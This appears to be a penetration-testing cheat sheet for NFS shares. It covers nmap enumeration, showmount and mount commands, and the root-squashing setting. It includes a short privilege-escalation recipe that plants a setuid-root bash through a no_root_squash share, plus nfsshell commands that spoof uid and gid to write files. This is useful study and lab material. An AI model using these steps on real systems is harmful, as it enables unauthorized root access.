NFS 2049

Configuration files

/etc/exports
/etc/lib/nfs/xtab

Enumeration

nmap -sV --script=nfs-* 192.168.44.133
nmap -sV --script=nfs-ls 192.168.44.133  //same result as rpcinfo
nmap -sV --script=nfs-* 192.168.44.133

Enumerate NFS shares:

showmount -e hostname/ip_address

Mount NFS shares:

mount -t nfs ip_address:/directory_found_exported /local_mount_point
mount -t nfs 192.168.1.72:/home/vulnix /tmp/mnt -nolock

/etc/exports file contains configurations and permissions of which folders/file systems are exported to remote users

Root Squashing

https://haiderm.com/linux-privilege-escalation-using-weak-nfs-permissions/

Root squashing - Prevents having root access to remote root users connected to NFS volume. Remote root users are assigned a user "nfsnobody" when connected.

no_root_squash - Gives the remote user root access to the connected system

With limited user account: cp /bin/bash /shared Then mount the share: mount -t nfs server:/shared /mnt/ and run chown root:root bash && chmod u+s bash Run the file with limited user account: /shared/bash

Tools

nfsshell> host <ip>
nfsshell> mount <name of the share>
nfsshell> gid 1000
nfsshell> uid 1000
nfsshell> put example
nfsshell> chmod 0777 example

References

New References

  • http://linuxadministrative.blogspot.com/2014/09/showmount-command-examples.html
  • Exploiting Network File System, (NFS), shares: http://www.vulnerabilityassessment.co.uk/nfs.htm